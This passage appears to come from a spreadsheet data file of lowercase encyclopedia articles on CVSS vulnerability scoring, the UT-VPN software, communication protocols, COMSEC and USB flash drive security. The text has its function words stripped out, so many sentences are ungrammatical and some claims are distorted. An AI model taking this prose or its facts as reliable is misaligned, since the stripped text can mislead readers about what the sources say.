{impact}})+(0.4\times {\textsf {exploitability}})-1.5)\times f({\textsf {impact}}))} metrics concatenated produce cvss vector vulnerability. example buffer overflow vulnerability affects server software allows remote user gain partial control system, including ability cause shut down: this would give exploitability sub-score impact sub-score 8.5, giving overall base score 9.0. vector base score case would av:n/ac:l/au:n/c:p/i:p/a:c. score vector normally presented together allow recipient fully understand nature vulnerability calculate environmental score necessary. temporal metrics value temporal metrics change lifetime vulnerability, exploits developed, disclosed automated mitigations fixes made available. exploitability exploitability metric describes current state exploitation techniques automated exploitation code. remediation level remediation level (rl) vulnerability allows temporal score vulnerability decrease mitigations official fixes made available. report confidence report confidence (rc) vulnerability measures level confidence existence vulnerability also credibility technical details vulnerability. calculations these three metrics used conjunction base score already calculated produce temporal score vulnerability associated vector. formula used calculate temporal score temporalscore roundto1decimal basescore exploitability remediationlevel reportconfidence {\displaystyle {\textsf {temporalscore}}={\textsf {roundto1decimal}}({\textsf {basescore}}\times {\textsf {exploitability}}\times {\textsf {remediationlevel}}\times {\textsf {reportconfidence}})} example continue example above, vendor first informed vulnerability posting proof-of-concept code mailing list, initial temporal score would calculated using values shown below: this would give temporal score 7.3, temporal vector e:p/rl:u/rc:uc full vector av:n/ac:l/au:n/c:p/i:p/a:c/e:p/rl:u/rc:uc). vendor confirms vulnerability, score rises 8.1, temporal vector e:p/rl:u/rc:c temporary vendor would reduce score back (e:p/rl:t/rc:c), official would reduce (e:p/rl:o/rc:c). possible confident every affected system fixed patched, temporal score cannot reduce certain level based vendor's actions, increase automated exploit vulnerability developed. environmental metrics environmental metrics base current temporal score assess severity vulnerability context vulnerable product software deployed. this measure calculated subjectively, typically affected parties. collateral damage potential collateral damage potential (cdp) metric measures potential loss impact either physical assets equipment (and lives), financial impact upon affected organisation vulnerability exploited. target distribution target distribution (td) metric measures proportion vulnerable systems environment. impact subscore modifier three metrics assess specific security requirements confidentiality (cr), integrity (ir) availability (ar), allowing environmental score fine-tuned according users' environment. calculations five environmental metrics used conjunction previously assessed base temporal metrics calculate environmental score produce associated environmental vector. adjustedimpact 10.41 confimpact confreq integimpact integreq availimpact availreq {\displaystyle {\textsf {adjustedimpact}}=\min(10,10.41\times (1-(1-{\textsf {confimpact}}\times {\textsf {confreq}})\times (1-{\textsf {integimpact}}\times {\textsf {integreq}})\times (1-{\textsf {availimpact}}\times {\textsf {availreq}})))} adjustedtemporal temporalscore recomputed basescore impact sub-equation replaced adjustedimpact equation {\displaystyle {\textsf {adjustedtemporal}}={\textsf {temporalscore}}{\text{ recomputed }}{\textsf {basescore}}{\text{s }}{\textsf {impact}}{\text{ sub-equation replaced }}{\textsf {adjustedimpact}}{\text{ equation}}} environmentalscore roundto1decimal adjustedtemporal adjustedtemporal collateraldamagepotential targetdistribution {\displaystyle {\textsf {environmentalscore}}={\textsf {roundto1decimal}}(({\textsf {adjustedtemporal}}+(10-{\textsf {adjustedtemporal}})\times {\textsf {collateraldamagepotential}})\times {\textsf {targetdistribution}})} example aforementioned vulnerable server used bank provide online banking services, temporary available vendor, environmental score could assessed this would give environmental score 8.2, environmental vector cdp:mh/td:h/cr:h/ir:h/ar:l. this score within range 7.0-10.0, therefore constitutes critical vulnerability context affected bank's business. criticism version several vendors organizations expressed dissatisfaction cvssv2. risk based security, manages open sourced vulnerability database, open security foundation jointly published public letter first regarding shortcomings failures cvssv2. authors cited lack granularity several metrics results cvss vectors scores properly distinguish vulnerabilities different type risk profiles. cvss scoring system also noted requiring much knowledge exact impact vulnerability. oracle introduced metric value "partial+" confidentiality, integrity, availability, fill perceived gaps description partial complete official cvss specifications. version address criticisms, development cvss version started 2012. final specification named cvss v3.0 released june 2015. addition specification document, user guide examples document also released.several metrics changed, added, removed. numerical formulas updated incorporate metrics retaining existing scoring range 0-10. textual severity ratings none (0), (0.1-3.9), medium (4.0-6.9), high (7.0-8.9), critical (9.0-10.0) defined, similar categories defined cvss part standard changes version base metrics base vector, metrics user interaction (ui) privileges required (pr) added help distinguish vulnerabilities required user interaction user administrator privileges exploited. previously, concepts part access vector metric cvssv2. base vector also introduction scope metric, designed make clear vulnerabilities exploited used attack parts system network. these metrics allow base vector clearly express type vulnerability evaluated. confidentiality, integrity availability metrics updated scores consisting none, low, high, rather none, partial, complete cvssv2. this allows flexibility determining impact vulnerability metrics. access complexity renamed attack complexity (ac) make clear access privileges moved separate metric. this metric describes repeatable exploit vulnerability high attacker requires perfect timing circumstances (other user interaction, also separate metric) easily duplicated future attempts. attack vector (av) inclusion metric value physical (p), describe vulnerabilities require physical access device system perform. temporal metrics temporal metrics essentially unchanged cvssv2. environmental metrics environmental metrics cvssv2 completely removed replaced essentially second base score, known modified vector. modified base intended reflect differences within organization company compared world whole. metrics capture importance confidentiality, integrity availability specific environment added. criticism version blog post september 2015, cert coordination center discussed limitations cvssv2 cvssv3.0 scoring vulnerabilities emerging technology systems internet things.in research review actually exploited vulnerabilities, cvss scores evaluated provide useful information predicting exploitation extent would drastically help patching priorisation without significant risk exploitation. version minor update cvss released june 2019. goal cvss version clarify improve upon existing cvss version standard without introducing metrics metric values, allowing frictionless adoption standard scoring providers scoring consumers alike. usability prime consideration making improvements cvss standard. several changes made cvss v3.1 improve clarity concepts introduced cvss v3.0, thereby improve overall ease standard. first used input industry subject-matter experts continue enhance refine cvss applicable vulnerabilities, products, platforms developed past years beyond. primary goal cvss provide deterministic repeatable score severity vulnerability across many different constituencies, allowing consumers cvss score input larger decision matrix risk, remediation, mitigation specific particular environment risk tolerance. updates cvss version specification include clarification definitions explanation existing base metrics attack vector, privileges required, scope, security requirements. standard method extending cvss, called cvss extensions framework, also defined, allowing scoring provider include additional metrics metric groups retaining official base, temporal, environmental metrics. additional metrics allow industry sectors privacy, safety, automotive, healthcare, etc., score factors outside core cvss standard. finally, cvss glossary terms expanded refined cover terms used throughout cvss version documentation. adoption versions cvss adopted primary method quantifying severity vulnerabilities wide range organizations companies, including: national vulnerability database (nvd) open source vulnerability database (osvdb) cert coordination center, particular makes cvssv2 base, temporal environmental metrics also common weakness enumeration (cwe) common vulnerabilities exposures (cve) common attack pattern enumeration classification (capec) references external links forum incident response security teams (first) cvss site national vulnerability database (nvd) cvss site common vulnerability scoring system calculator</t>
  </si>
  <si>
    <t>UT-VPN</t>
  </si>
  <si>
    <t>university tsukuba virtual private network, ut-vpn free open source software application implements virtual private network (vpn) techniques creating secure point-to-point site-to-site connections routed bridged configurations remote access facilities. uses ssl/tls security encryption capable traversing network address translators (nats) firewalls. written daiyuu nobori softether corporation, published general public license (gpl) university tsukuba. ut-vpn compatible packetix product softether corporation. ut-vpn developed based packetix vpn, functions deleted. example, radius client supported packetix server, supported ut-vpn server. architecture encryption ut-vpn uses openssl library provide encryption packets. authentication ut-vpn offers username/password-based authentication. networking ut-vpn software consist ut-vpn server ut-vpn client. ut-vpn functions l2-vpn (over ssl/tls). ut-vpn client 'virtual nic' (virtual network interface card) installed ut-vpn client installed virtual recognized physical ut-vpn encapsulation ssl/tls) packets frames virtual nic. ut-vpn client connects ut-vpn server. authorization ut-vpn server succeeded, ut-vpn client establishes connection virtual hub. ut-vpn server ut-vpn server 'virtual hub', function virtual switch. virtual handle frames received ut-vpn client. necessary, ut-vpn server forwards encapsulated frames ut-vpn client. virtual ut-vpn server function cascading connection virtual ut-vpn server. site-to-site connection come true cascading connection. bridge ut-vpn server bridging function arbitrary virtual hub. switch ut-vpn server virtual switch function. virtual switch l3-switching virtual ut-vpn server. operational environment ut-vpn server windowswindows millennium edition windows windows 2000 windows windows server 2003 windows vista windows server 2008 hyper-v server windows windows server 2008 supported x86/x64unixlinux (2.4 later) freebsd (6.0 later) solaris (8.0 later) (tiger later)* environment compiling possible source code, ut-vpn server works. ut-vpn client windowswindows windows windows 2000 windows windows server 2003 windows vista windows server 2008 hyper-v server windows windows server 2008 r2*supported x86/x64unixlinux (2.4 later)* virtual work unix operating systems. community primary method community support softether mailing lists. also university tsukuba softether corporation openvpn, well-known open source software. references external links official links ut-vpn opensource project (japanese) ut-vpn download (japanese, require email address)</t>
  </si>
  <si>
    <t>Communications protocol</t>
  </si>
  <si>
    <t>communication protocol system rules allows entities communications system transmit information kind variation physical quantity. protocol defines rules, syntax, semantics synchronization communication possible error recovery methods. protocols implemented hardware, software, combination both.communicating systems well-defined formats exchanging various messages. each message exact meaning intended elicit response range possible responses pre-determined particular situation. specified behavior typically independent implemented. communication protocols agreed upon parties involved. reach agreement, protocol developed technical standard. programming language describes computations, close analogy protocols programming languages: protocols communication programming languages computations. alternate formulation states protocols communication algorithms computation.multiple protocols often describe different aspects single communication. group protocols designed work together known protocol suite; implemented software protocol stack. internet communication protocols published internet engineering task force (ietf). ieee (institute electrical electronics engineers) handles wired wireless networking international organization standardization (iso) handles types. itu-t handles telecommunications protocols formats public switched telephone network (pstn). pstn internet converge, standards also driven towards convergence. communicating systems history first uses term protocol data-commutation context occurs memorandum entitled protocol data communications network written roger scantlebury keith bartlett april 1967.on arpanet, starting point host-to-host communication 1969 1822 protocol, defined transmission messages imp. network control protocol (ncp) arpanet first implemented 1970. interface allowed application software connect across arpanet implementing higher-level communication protocols, early example protocol layering concept.networking research early 1970s robert kahn vint cerf formulation transmission control program (tcp). specification written cerf yogen dalal carl sunshine december 1974, still monolithic design time. international networking working group agreed connectionless datagram standard presented ccit 1975 adopted arpanet. international research, particularly work rémi després, contributed development x.25 standard, based virtual circuits itu-t 1976. computer manufacturers developed proprietary protocols ibm's systems network architecture (sna), digital equipment corporation's decnet xerox network systems.tcp software redesigned modular protocol stack. originally referred ip/tcp, installed satnet 1982 arpanet january 1983. development complete protocol suite 1989, outlined 1122 1123, laid foundation growth tcp/ip comprehensive protocol suite core component emerging internet.international work reference model communication standards model, published 1984. period late 1980s early 1990s, engineers, organizations nations became polarized issue standard, model internet protocol suite, would result best robust computer networks. concept information exchanged devices network media governed rules conventions communication protocol specifications. nature communication, actual data exchanged state-dependent behaviors, defined specifications. digital computing systems, rules expressed algorithms data structures. protocols communication algorithms programming languages computations.operating systems usually contain cooperating processes manipulate shared data communicate other. this communication governed well-understood protocols, embedded process code itself. contrast, shared memory, communicating systems communicate using shared transmission medium. transmission necessarily reliable, individual systems different hardware operating systems. implement networking protocol, protocol software modules interfaced framework implemented machine's operating system. this framework implements networking functionality operating system. when protocol algorithms expressed portable programming language protocol software made operating system independent. best-known frameworks tcp/ip model model. time internet developed, abstraction layering proven successful design approach compiler operating system design and, given similarities programming languages communication protocols, originally monolithic networking programs decomposed cooperating protocols. this gave rise concept layered protocols nowadays forms basis protocol design.systems typically single protocol handle transmission. instead cooperating protocols, sometimes called protocol suite. some best known protocol suites tcp/ip, ipx/spx, x.25, ax.25 appletalk. protocols arranged based functionality groups, instance, group transport protocols. functionalities mapped onto layers, layer solving distinct class problems relating instance: application-, transport-, internet- network interface-functions. transmit message, protocol selected layer. selection next protocol accomplished extending message protocol selector layer. types there types communication protocols, based representation content carried: text-based binary. text-based text-based protocol plain text protocol represents content human-readable format, often plain text. immediate human readability stands contrast binary protocols inherent benefits computer environment (such ease mechanical parsing improved bandwidth utilization). network applications various methods encapsulating data. method common internet protocols text oriented representation transmits requests responses lines ascii text, terminated newline character (and usually carriage return character). examples protocols plain, human-readable text commands (file transfer protocol), smtp (simple mail transfer protocol), finger protocol.text-based protocols typically optimized human parsing interpretation, therefore suitable whenever human inspection protocol contents required, debugging early protocol development design phases. clear, digital communication fundamentally binary. “text” based protocols mentioned binary content, made “humanly readable” text editor software). binary binary protocol utilizes values byte, opposed text-based protocol uses values corresponding human-readable characters ascii encoding. binary protocols intended read machine rather human being. binary protocols advantage terseness, translates speed transmission interpretation.binary used normative documents describing modern standards like ebxml, http/2, http/3 edoc. interface also considered binary protocol. basic requirements getting data across network part problem protocol. data received evaluated context progress conversation, protocol must include rules describing context. these kind rules said express syntax communication. other rules determine whether data meaningful context exchange takes place. these kind rules said express semantics communication. messages sent received communicating systems establish communication. protocols therefore specify rules governing transmission. general, much following addressed: data formats data exchange digital message bitstrings exchanged. bitstrings divided fields field carries information relevant protocol. conceptually bitstring divided parts called header payload. actual message carried payload. header area contains fields relevance operation protocol. bitstrings longer maximum transmission unit (mtu) divided pieces appropriate size. address formats data exchange addresses used identify sender intended receiver(s). addresses carried header area bitstrings, allowing receivers determine whether bitstrings interest processed ignored. connection sender receiver identified using address pair (sender address, receiver address). usually, address values special meanings. all-1s address could taken mean addressing stations network, sending address would result broadcast local network. rules describing meanings address value collectively called addressing scheme. address mapping sometimes protocols need addresses scheme addresses another scheme. instance translate logical address specified application ethernet address. this referred address mapping. routing when systems directly connected, intermediary systems along route intended receiver(s) need forward messages behalf sender. internet, networks connected using routers. interconnection networks routers called internetworking. detection transmission errors error detection necessary networks data corruption possible. common approach, data area added packets, making possible receiver detect differences caused corruption. receiver rejects packets differences arranges somehow retransmission. acknowledgements acknowledgement correct reception packets required connection-oriented communication. acknowledgments sent receivers back respective senders. loss information timeouts retries packets lost network delayed transit. cope this, protocols, sender expect acknowledgment correct reception receiver within certain amount time. thus, timeouts, sender need retransmit information. case permanently broken link, retransmission effect number retransmissions limited. exceeding retry limit considered error. direction information flow direction needs addressed transmissions occur direction time half-duplex links sender time shared medium. this known media access control. arrangements made accommodate case collision contention parties respectively simultaneously transmit wish transmit. sequence control long bitstrings divided pieces sent network individually, pieces lost delayed types networks, take different routes destination. result, pieces arrive sequence. retransmissions result duplicate pieces. marking pieces sequence information sender, receiver determine lost duplicated, necessary retransmissions reassemble original message. flow control flow control needed sender transmits faster receiver intermediate network equipment process transmissions. flow control implemented messaging receiver sender. queueing communicating processes state machines employ queues "buffers"), usually fifo queues, deal messages order sent, sometimes multiple queues different prioritization protocol design systems engineering principles applied create common network protocol design principles. design complex protocols often involves decomposition simpler, cooperating protocols. such cooperating protocols sometimes called protocol family protocol suite, within conceptual framework. communicating systems operate concurrently. important aspect concurrent programming synchronization software receiving transmitting messages communication proper sequencing. concurrent programming traditionally topic operating systems theory texts. formal verification seems indispensable concurrent programs notorious hidden sophisticated bugs contain. mathematical approach study concurrency communication referred communicating sequential processes (csp). concurrency also modeled using finite state machines, mealy moore machines. mealy moore machines design tools digital electronics systems encountered form hardware used telecommunication electronic devices general.the literature presents numerous analogies computer communication programming. analogy, transfer mechanism protocol comparable central processing unit (cpu). framework introduces rules allow programmer design cooperating protocols independently another. layering modern protocol design, protocols layered form protocol stack. layering design principle divides protocol design task smaller steps, accomplishes specific part, interacting parts protocol small number well-defined ways. layering allows parts protocol designed tested without combinatorial explosion cases, keeping design relatively simple. communication protocols internet designed function diverse complex settings. internet protocols designed simplicity modularity coarse hierarchy functional layers defined internet protocol suite. first cooperating protocols, transmission control protocol (tcp) internet protocol (ip) resulted decomposition original transmission control program, monolithic communication protocol, layered communication suite. model developed internationally based experience networks predated internet reference model general communication much stricter rules protocol interaction rigorous layering. typically, application software built upon robust data transport layer. underlying transport layer datagram delivery routing mechanism typically connectionless internet. packet relaying across networks happens another layer involves network link technologies, often specific certain physical layer technologies, ethernet. layering provides opportunities exchange technologies needed, example, protocols often stacked tunneling arrangement accommodate connection dissimilar networks. example, tunneled across asynchronous transfer mode (atm) network. protocol layering protocol layering forms basis protocol design. allows decomposition single, complex protocols simpler, cooperating protocols. protocol layers solve distinct class communication problems. together, layers make layering scheme model. computations deal algorithms data; communication involves protocols messages; analog data flow diagram kind message flow diagram. visualize protocol layering protocol suites, diagram message flows systems, shown figure systems, make protocol suite. vertical flows (and protocols) in-system horizontal message flows (and protocols) systems. message flows governed rules, data formats specified protocols. blue lines mark boundaries (horizontal) protocol layers. software layering software supporting protocols layered organization relationship protocol layering shown figure send message system top-layer software module interacts module directly hands message encapsulated. lower module fills header data accordance protocol implements interacts bottom module sends message communications channel bottom module system receiving system reverse happens, ultimately message gets delivered original form module system b.program translation divided subproblems. result, translation software layered well, allowing software layers designed independently. approach seen tcp/ip layering.the modules application layer generally considered part operating system. passing data modules much less expensive passing data application program transport layer. boundary application layer transport layer called operating system boundary. strict layering strictly adhering layered model, practice known strict layering, always best approach networking. strict layering negative impact performance implementation.while protocol layering today ubiquitous across field computer networking, historically criticized many researchers abstracting protocol stack cause higher layer duplicate functionality lower layer, prime example error recovery per-link basis end-to-end basis. design patterns commonly recurring problems design implementation communication protocols addressed software design patterns. formal specification popular formal methods describing communication syntax abstract syntax notation standard) augmented backus–naur form ietf standard). finite-state machine models used formally describe possible interactions protocol. communicating finite-state machines protocol development communication occur, protocols selected. rules expressed algorithms data structures. hardware operating system independence enhanced expressing algorithms portable programming language. source independence specification provides wider interoperability. protocol standards commonly created obtaining approval support standards organization, initiates standardization process. members standards organization agree adhere work result voluntary basis. often members control large market-shares relevant protocol many cases, standards enforced government thought serve important public interest, getting approval important protocol. need protocol standards need protocol standards shown looking happened bi-sync protocol (bsc) invented ibm. early link-level protocol used connect separate nodes. originally intended used multinode network, revealed several deficiencies protocol. absence standardization, manufacturers organizations felt free enhance protocol, creating incompatible versions networks. cases, deliberately done discourage users using equipment manufacturers. there variants original bi-sync protocol. assume, standard would prevented least happening.in cases, protocols gain market dominance without going standardization process. such protocols referred facto standards. facto standards common emerging markets, niche markets, markets monopolized oligopolized). they hold market negative grip, especially used scare away competition. from historical perspective, standardization seen measure counteract ill-effects facto standards. positive exceptions exist; facto standard operating system like linux negative grip market, sources published maintained open way, thus inviting competition. standards organizations some standards organizations relevance communication protocols international organization standardization (iso), international telecommunication union (itu), institute electrical electronics engineers (ieee), internet engineering task force (ietf). ietf maintains protocols internet. ieee controls many software hardware protocols electronics industry commercial consumer devices. umbrella organization telecommunication engineers designing public switched telephone network (pstn), well many radio communication systems. marine electronics nmea standards used. world wide consortium (w3c) produces protocols standards technologies. international standards organizations supposed impartial local organizations national commercial self-interest consider. standards organizations also research development standards future. practice, standards organizations mentioned, cooperate closely other. standardization process iso, standardization process starts commissioning sub-committee workgroup. workgroup issues working drafts discussion documents interested parties (including standards bodies) order provoke discussion comments. this generate questions, much discussion usually disagreement. these comments taken account draft proposal produced working group. after feedback, modification, compromise proposal reaches status draft international standard, ultimately international standard. international standards reissued periodically handle deficiencies reflect changing views subject. standardization lesson learned arpanet, predecessor internet, protocols need framework operate. therefore important develop general-purpose, future-proof framework suitable structured protocols (such layered protocols) standardization. this would prevent protocol standards overlapping functionality would allow clear definition responsibilities protocol different levels (layers). this gave rise open systems interconnection model (osi model), used framework design standard protocols services conforming various layer specifications.in model, communicating systems assumed connected underlying physical medium providing basic transmission mechanism. layers numbered. each layer provides service layer using services layer immediately layer provides services application process. layers communicate means interface, called service access point. corresponding layers system called peer entities. communicate, peer entities given layer protocol specific layer implemented using services layer below. layer, types standards: protocol standards defining peer entities given layer communicate, service standards defining given layer communicates layer model, layers functionality (from highest lowest layer): application layer provide following services application processes: identification intended communication partners, establishment necessary authority communicate, determination availability authentication partners, agreement privacy mechanisms communication, agreement responsibility error recovery procedures ensuring data integrity, synchronization cooperating application processes, identification constraints syntax (e.g. character sets data structures), determination cost acceptable quality service, selection dialogue discipline, including required logon logoff procedures. presentation layer provide following services application layer: request establishment session, data transfer, negotiation syntax used application layers, necessary syntax transformations, formatting special purpose transformations (e.g. data compression data encryption). session layer provide following services presentation layer: establishment release session connections, normal expedited data exchange, quarantine service allows sending presentation entity instruct receiving session entity release data presentation entity without permission, interaction management presentation entities control whose turn perform certain control functions, resynchronization session connection, reporting unrecoverable exceptions presentation entity. transport layer provides reliable transparent data transfer cost-effective required selected quality service. support multiplexing several transport connections network connection split transport connection several network connections. network layer setup, maintenance release network paths transport peer entities. when relays needed, routing relay functions provided layer. quality service negotiated network transport entities time connection this layer also responsible network congestion control. data link layer setup, maintenance release data link connections. errors occurring physical layer detected corrected. errors reported network layer. exchange data link units (including flow control) defined layer. physical layer describes details like electrical characteristics physical connection, transmission techniques used, setup, maintenance clearing physical connections.in contrast tcp/ip layering scheme, assumes connectionless network, rm/osi assumed connection-oriented network. connection-oriented networks suitable wide area networks connectionless networks suitable local area networks. connection-oriented communication requires form session (virtual) circuits, hence tcp/ip model lacking) session layer. constituent members mostly concerned wide area networks, development rm/osi concentrated connection-oriented networks connectionless networks first mentioned addendum rm/osi later incorporated update rm/osi.at time, ietf cope fact internet needed protocols simply there. result, ietf developed standardization process based "rough consensus running code". standardization process described 2026. nowadays, ietf become standards organization protocols internet. rm/osi extended model include connectionless services this, could developed international standards. taxonomies classification schemes protocols usually focus domain function. example domain use, connection-oriented protocols connectionless protocols used connection-oriented networks connectionless networks respectively. example function tunneling protocol, used encapsulate packets high-level protocol packets passed across transport system using high-level protocol. layering scheme combines function domain use. dominant layering schemes ones developed ietf iso. despite fact underlying assumptions layering schemes different enough warrant distinguishing two, common practice compare relating common protocols layers schemes. layering scheme ietf called internet layering tcp/ip layering. layering scheme called model layering. networking equipment configuration, term-of-art distinction often drawn: term protocol strictly refers transport layer, term service refers protocols utilizing protocol transport. common case udp, services distinguished port numbers. conformance port numbers voluntary, content inspection systems term service strictly refers port numbers, term application often used refer protocols identified inspection signatures. also lists network protocols notes references bibliography radia perlman: interconnections: bridges, routers, switches, internetworking protocols. edition. addison-wesley 1999, isbn 0-201-63448-1. particular "network design folklore", also available online gerard holzmann: design validation computer protocols. prentice hall, 1991, isbn 0-13-539925-4. also available online douglas comer (2000). internetworking tcp/ip principles, protocols architecture (4th ed.). prentice hall. isbn 0-13-018380-6. particular ch.11 protocol layering. also guide glossary internetworking terms abbreviations. internet engineering task force abbr. ietf (1989): rfc1122, requirements internet hosts communication layers, braden (ed.), available online http://tools.ietf.org/html/rfc1122. describes tcp/ip implementors protocolsoftware. particular introduction gives overview design goals suite. ben-ari (1982): principles concurrent programming 10th print. prentice hall international, isbn 0-13-701078-8. c.a.r. hoare (1985): communicating sequential processes 10th print. prentice hall international, isbn 0-13-153271-5. available online http://www.usingcsp.com r.d. tennent (1981): principles programming languages 10th print. prentice hall international, isbn 0-13-709873-1. brian marsden (1986): communication network protocols edition. chartwell bratt, isbn 0-86238-106-1. andrew tanenbaum (1984): structured computer organization 10th print. prentice hall international, isbn 0-13-854605-3. external links javvin's protocol dictionary overview protocols telecontrol field reference model</t>
  </si>
  <si>
    <t>Communications security</t>
  </si>
  <si>
    <t>communications security discipline preventing unauthorized interceptors accessing telecommunications intelligible form, still delivering content intended recipients. north atlantic treaty organization culture, including united states department defense culture, often referred abbreviation comsec. field includes cryptographic security, transmission security, emissions security physical security comsec equipment associated keying material. comsec used protect classified unclassified traffic military communications networks, including voice, video, data. used analog digital applications, wired wireless links. voice secure internet protocol vosip become facto standard securing voice communication, replacing need secure terminal equipment (ste) much nato, including u.s.a. uscentcom moved entirely vosip 2008. specialties cryptographic security: component communications security results provision technically sound cryptosystems proper use. this includes ensuring message confidentiality authenticity. emission security (emsec): protection resulting measures taken deny unauthorized persons information value might derived communications systems cryptographic equipment intercepts interception analysis compromising emanations cryptographic—equipment, information systems, telecommunications systems. transmission security (transec): component communications security results application measures designed protect transmissions interception exploitation means cryptanalysis (e.g. frequency hopping spread spectrum). physical security: component communications security results physical measures necessary safeguard classified equipment, material, documents access thereto observation thereof unauthorized persons. related terms akms army management system algorithmic encryption common tier controlled cryptographic item equipment contains comsec embedded devices aces automated communications engineering software data transfer device icom integrated comsec, e.g. radio built encryption traffic encryption trunk encryption device walburn/kg family encryption production over wire otar over rekeying lcms local comsec management software kyk-13 electronic transfer device koi-18 tape reader general purpose kyx-15 electronic transfer device kg-30 family comsec equipment tsec telecommunications security (sometimes referred error transmission security transec) signal operating instructions simple loader person integrity stu-iii (obsolete secure phone, replaced ste) secure terminal equipment (secure phone)types comsec equipment: crypto equipment: equipment embodies cryptographic logic performs cryptographic functions (key generation, encryption, authentication). crypto-ancillary equipment: equipment designed specifically facilitate efficient reliable operation crypto-equipment, without performing cryptographic functions itself. crypto-production equipment: equipment used produce load keying material authentication equipment: electronic management system electronic management system (ekms) united states department defense (dod) management, comsec material distribution, logistics support system. national security agency (nsa) established ekms program supply electronic comsec devices securely timely manner, provide comsec managers automated system capable ordering, generation, production, distribution, storage, security accounting, access control. army's platform four-tiered ekms, akms, automates frequency management comsec management operations. eliminates paper keying material, hardcopy soi, associated time resource-intensive courier distribution. components: lcms provides automation detailed accounting required every comsec account, electronic generation distribution capability. aces frequency management portion akms. aces designated military communications electronics board joint standard services development frequency management cryptonet planning. software fielded, ruggedized hand-held device handles, views, stores, loads soi, key, electronic protection data. provides improved net-control device automate crypto-net control operations communications networks employing electronically keyed comsec equipment. hand-held handles, views, stores, loads soi, key, electronic protection data. management infrastructure (kmi) program intended replace legacy electronic management system provide means securely ordering, generating, producing, distributing, managing, auditing cryptographic products (e.g., asymmetric keys, symmetric keys, manual cryptographic systems, cryptographic applications). this system currently fielded major commands variants required non-dod agencies comsec mission. also dynamic secrets electronics technician (united states navy) information security information warfare list telecommunications encryption terms encryption systems product types operations security secure communication signals intelligence traffic analysis references this article incorporates public domain material general services administration document: "federal standard 1037c". support mil-std-188) national information systems security glossary this article incorporates public domain material united states department defense document: "dictionary military associated terms". "information security guidelines deployment deployable switched systems" (pdf). joint staff. february 2001. archived original (pdf) september 2012. "communications security (comsec) awareness training". u.s. army signal center fort gordon. april 2000. archived original march 2009. https://web.archive.org/web/20121002192433/http://www.dtic.mil/whs/directives/corres/pdf/466002p.pdf "army management systems (akms)". project manager netops current force. archived original september 2010. cryptography machines</t>
  </si>
  <si>
    <t>USB flash drive security</t>
  </si>
  <si>
    <t>secure flash drives protect data stored access unauthorized users. flash drive products market since 2000, increasing exponentially. consumers businesses increased demand drives, manufacturers producing faster devices greater data storage capacities. increasing number portable devices used business, laptops, notebooks, personal digital assistants (pda), smartphones, flash drives mobile devices. companies particular risk sensitive data stored unsecured flash drives employees devices transport data outside office. consequences losing drives loaded information significant, including loss customer data, financial information, business plans confidential information, associated risk reputation damage. major dangers drives flash drives pose major challenges information system security: data leakage owing small size ubiquity system compromise infections computer viruses, malware spyware. data leakage large storage capacity flash drives relative small size cost means using data storage without adequate operational logical controls pose serious threat information availability, confidentiality integrity. following factors taken consideration securing important assets: storage: flash drives hard track physically, stored bags, backpacks, laptop cases, jackets, trouser pockets left unattended workstations. usage: tracking corporate data stored personal flash drives significant challenge; drives small, common constantly moving. while many enterprises strict management policies toward drives companies outright minimize risk, others seem unaware risks devices pose system security.the average cost data breach source (not necessarily flash drive) ranges less $100,000 $2.5 million.a sandisk survey characterized data corporate users frequently copy: customer data (25%) financial information (17%) business plans (15%) employee data (13%) marketing plans (13%) intellectual property (6%) source code (6%)examples security breaches resulting drives include: revenue customs lost personal details 6,500 private pension holders united states: drive stolen names, grades, social security numbers 6,500 former students flash drives army classified military information sale bazaar outside bagram, afghanistan. malware infections early days computer viruses, malware, spyware, primary means transmission infection floppy disk. today, flash drives perform data software storage transfer role floppy disk, often used transfer files computers different networks, different offices, owned different people. this made flash drives leading form information system infection. when piece malware gets onto flash drive, infect devices drive subsequently plugged. prevalence malware infection means flash drive documented 2011 microsoft study analyzing data million systems worldwide first half 2011. study found percent malware infections windows system flash drives exploiting autorun feature microsoft windows. that finding line statistics, monthly reporting commonly detected malware antivirus company eset, lists abuse autorun.inf first among threats 2011.the windows autorun.inf file contains information programs meant automatically removable media (often flash drives similar devices) accessed windows user. default autorun setting windows versions prior windows automatically program listed autorun.inf file access many kinds removable media. many types malware copy removable storage devices: always program's primary distribution mechanism, malware authors often build additional infection techniques. examples malware spread flash drives include: duqu collection computer malware. flame modular computer malware. stuxnet malicious computer worm. solutions since security physical drive cannot guaranteed without compromising benefits portability, security measures primarily devoted making data compromised drive inaccessible unauthorized users unauthorized processes, executed malware. common approach encrypt data storage routinely scan flash drives computer viruses, malware spyware antivirus program, although methods possible. software encryption software solutions bitlocker, diskcryptor popular veracrypt allow contents drive encrypted automatically transparently. also, windows enterprise, windows ultimate windows server 2008 provide drive encryption using bitlocker apple computer operating system provided software disc data encryption since panther issued 2003 (see also: disk utility).additional software installed external drive prevent access files case drive becomes lost stolen. installing software company computers help track minimize risk recording interactions drive computer storing centralized database. hardware encryption some drives utilize hardware encryption microchips within drive provide automatic transparent encryption. some manufacturers offer drives require code entered physical keypad device allowing access drive. cost drives significant starting fall type drive gaining popularity. hardware systems offer additional features, ability automatically overwrite contents drive wrong password entered certain number times. this type functionality cannot provided software system since encrypted data simply copied drive. however, form hardware security result data loss activated accidentally legitimate users strong encryption algorithms essentially make functionality redundant. encryption keys used hardware encryption typically never stored computer's memory, technically hardware solutions less subject "cold boot" attacks software-based systems. reality however, "cold boot" attacks pose little any) threat, assuming basic, rudimentary, security precautions taken software-based systems. compromised systems security encrypted flash drives constantly tested individual hackers well professional security firms. times january 2010) flash drives positioned secure found poorly designed provide little actual security, giving access data without knowledge correct password.flash drives compromised (and claimed fixed) include: sandisk cruzer enterprise kingston datatraveler blackbox verbatim corporate secure flash drive trek technology thumbdrive cryptoall companies reacted immediately. kingston offered replacement drives different security architecture. sandisk, verbatim, trek released patches. remote management commercial environments, secure drives used, central/remote management system provide organizations additional level asset control, significantly reducing risks harmful data breach. this include initial user deployment ongoing management, password recovery, data backup, remote tracking sensitive data termination issued secure drives. such management systems available software service (saas), internet connectivity allowed, behind-the-firewall solutions. also health insurance portability accountability (hipaa) (moving confidential data requires encryption.) cruzer enterprise data remanence ironkey kingston technology references external links analysis flash drives virtual environment, derek huebner, small scale digital device forensics journal, vol. june 2007 (archived original october 2013) dataquest insight: flash drive market trends, worldwide, 2001–2010, joseph unsworth, gartner, november 2006. computerworld review: secure drives, bill o'brien, rich ericson lucas mearian, march 2008 (archived original february 2009) badusb accessories turn evil youtube, karsten nohl jakob lell</t>
  </si>
  <si>
    <t>Commvault</t>
  </si>
  <si>
